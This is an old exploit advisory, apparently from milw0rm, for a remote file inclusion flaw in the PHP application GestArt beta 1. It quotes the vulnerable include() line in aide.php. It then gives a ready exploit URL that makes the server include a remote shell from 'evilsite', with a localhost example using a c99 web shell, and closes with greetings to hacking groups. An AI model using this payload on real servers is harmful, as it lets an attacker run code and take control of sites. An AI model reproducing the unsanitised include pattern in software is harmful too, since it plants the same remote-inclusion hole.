Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16336
HistoryMar 14, 2007 - 12:00 a.m.

GestArt beta 1 (aide.php aide) Remote File Inclusion Vulnerability:

2007-03-1400:00:00
vulners.com
13
                                                      .-""""""""-.                                 
                                                     /   Dj7xpl   \                              
                                                    |              |                                
                                                    |,  .-.  .-.  ,|                                
                                                    | )(_o/  \o_)( |                                     
                                                    |/     /\     \|                                 
                                          (@_       (_     ^^     _)                  
                                     _     ) \_______\__|IIIIII|__/_______________________________
                                    (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                           )_/        \          / 
                                           (@

+____Iranian Are The Best In World+

Portal : GestArt

Download : http://www.phpscripts-fr.net/scripts/scripts.php?cat=Gestion

Author : Dj7xpl | [email protected]

Risk : High (Remote File Inclusion Exploit)

+_______________________________________________________________________________________________________________________+

±------------**************************************** aide.php*********************************************-----------+

<? include("$aide.txt");?> </p> <<<< line (21)

±------------***********************************************************************************************-----------+

+_______________________________________________________________________________________________________________________+

Exploit : http://[target]/[path]/aide.php?aide=http://evilsite/shell <<<< Shell (Text File)

Example : http://localhost/getart/aide.php?aide=http://localhost/c99 <<<< c99.txt

+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+

Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh …

+_______________________________________________________________________________________________________________________+

milw0rm.com [2007-03-13]